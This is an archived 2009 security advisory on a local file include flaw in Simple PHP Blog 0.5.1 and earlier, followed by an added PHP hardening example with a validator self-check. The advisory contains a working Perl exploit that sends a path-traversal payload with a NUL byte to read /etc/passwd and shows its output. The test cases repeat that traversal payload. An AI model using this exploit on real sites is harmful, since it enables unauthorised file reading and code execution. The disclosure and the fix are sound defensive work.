Date: Fri, 18 Dec 2009 13:14:03 +0100
From: ISecAuditors Security Advisories <advisories@...cauditors.com>
To: bugs@...uritytracker.com, news@...uriteam.com, full-disclosure@...ts.grok.org.uk, vuln@...unia.com, packet@...ketstormsecurity.org, bugtraq@...urityfocus.com
Subject: [ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-005
- Original release date: March 2nd, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=============================================

I. VULNERABILITY
-------------------------
Simple PHP Blog <= 0.5.1 Local File Include vulnerability

II. BACKGROUND
-------------------------
Simple PHP Blog is a blog system that does not require a database setup and is very easy to install.

III. DESCRIPTION
-------------------------
Simple PHP Blog <= 0.5.1 is affected by a Local File Include vulnerability in 'languages_cgi.php' because the 'blog_language1' parameter is not properly sanitized.

IV. PROOF OF CONCEPT
-------------------------
The affected code:

62 require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

Exploit:

#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana <at> isecauditors=dot=com
# Internet Security Auditors

use LWP::UserAgent;

if ($#ARGV < 3) {
    die("Usage: $0 <site> <path> <file> <cookie>");
}

$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");

my $req = new HTTP::Request POST => "http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]%00");

my $res = $ua->request($req);
if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " . $res->status_line, "\n";
}

$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here> | head -1
root:*:0:0:root:/root:/bin/bash

The bug can be exploited with or without 'magic_quotes_gpc'. If magic_quotes_gpc is set to Off, an attacker can read any file (such as /etc/passwd) by appending a '\0' character to the path; if it is On, only PHP files can be included, which still allows execution of any local PHP file.

V. BUSINESS IMPACT
-------------------------
An attacker can read arbitrary files in the context of the web server and execute arbitrary local PHP scripts.

VI. SYSTEMS AFFECTED
-------------------------
Versions prior to and including 0.5.1 are affected.

In order to patch the application, the functions file_exists() and basename() must be added to the affected code.

VII. SOLUTION
-------------------------
Change line 62 of languages_cgi.php in order to filter the $_POST[ 'blog_language1' ] variable:

if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
    require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

VIII. REFERENCES
-------------------------
http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 02, 2009: Initial release.
December 18, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
March 02, 2009: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
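The following is an added example written for this archive page; it is not code from Simple PHP Blog or from Internet Security Auditors. It shows the vulnerable include quoted in sections IV and VII beside a hardened replacement that applies the advisory's character-class check and, as the advisory's section VI suggests, also checks the language directory against what exists on disk. It assumes the languages/<code>/strings.php layout described above and PHP 7.1 or later (preg_match() stands in for ereg(), which was removed in PHP 7); the function names installed_languages(), validate_language() and load_blog_language() are hypothetical, and the whitelist and inputs in the self-check are constructed.

```php
<?php
// Added example, not the Simple PHP Blog project's code: a hardened
// replacement for the require_once on line 62 of languages_cgi.php.
// Assumes the languages/<code>/strings.php layout from the advisory and
// PHP 7.1+. Function names below are ours (hypothetical).

// Vulnerable form quoted in the advisory, kept here only for comparison:
//   require_once('languages/' . $_POST['blog_language1'] . '/strings.php');
// Anything the client sends lands inside the path unmodified, so "../"
// walks out of languages/ and a trailing NUL drops the "/strings.php" suffix.

/**
 * Build the whitelist of language codes that actually exist on disk:
 * only directories that contain a strings.php are accepted.
 */
function installed_languages(string $langDir): array
{
    $codes = array();
    foreach (scandir($langDir) as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        if (is_file($langDir . '/' . $entry . '/strings.php')) {
            $codes[] = $entry;
        }
    }
    return $codes;
}

/**
 * Validate an untrusted language code. Returns the code when it is safe,
 * or null when the request must be rejected.
 */
function validate_language(string $input, array $installed): ?string
{
    // Strict character class (same as the advisory's ereg pattern): '/', '\',
    // '.', NUL and anything else that could alter the resolved path is
    // refused before the value ever touches a filesystem call.
    if (!preg_match('/^[a-zA-Z0-9_]+$/', $input)) {
        return null;
    }
    // Defence in depth: a well-formed code must also name an installed language.
    if (!in_array($input, $installed, true)) {
        return null;
    }
    return $input;
}

/**
 * Hardened replacement for the original include. On rejection it falls back
 * to a default language instead of including anything derived from the request.
 */
function load_blog_language(array $post, string $langDir, string $default = 'en'): string
{
    $installed = installed_languages($langDir);
    $code = validate_language((string)($post['blog_language1'] ?? ''), $installed);
    if ($code === null) {
        $code = $default;   // assumed to be installed on a sane deployment
    }
    $file = $langDir . '/' . $code . '/strings.php';
    require_once $file;
    return $file;
}

// Self-check against a constructed whitelist (no files are touched, so
// this part runs anywhere). Expected: only 'en' and 'es' are accepted.
$installed = array('en', 'es', 'de');
$cases = array(
    'en'                           => 'en',  // legitimate
    'es'                           => 'es',  // legitimate
    'fr'                           => null,  // well-formed but not installed
    '../../../../../etc/passwd'    => null,  // traversal
    "../../../../../etc/passwd\0"  => null,  // traversal plus NUL truncation
    'en/../../index'               => null,  // traversal behind a valid prefix
    ''                             => null,  // empty
);
foreach ($cases as $input => $expected) {
    $got = validate_language((string)$input, $installed);
    printf("%-32s => %s\n", addcslashes((string)$input, "\0..\37"),
           $got === null ? 'rejected' : 'accepted');
    assert($got === $expected);
}
```

The regex alone already blocks every traversal payload in the self-check; the on-disk whitelist matters when the regex is later loosened (for example to allow codes like "pt-BR"), because it keeps the include bound to directories the administrator actually shipped rather than to whatever happens to match a pattern.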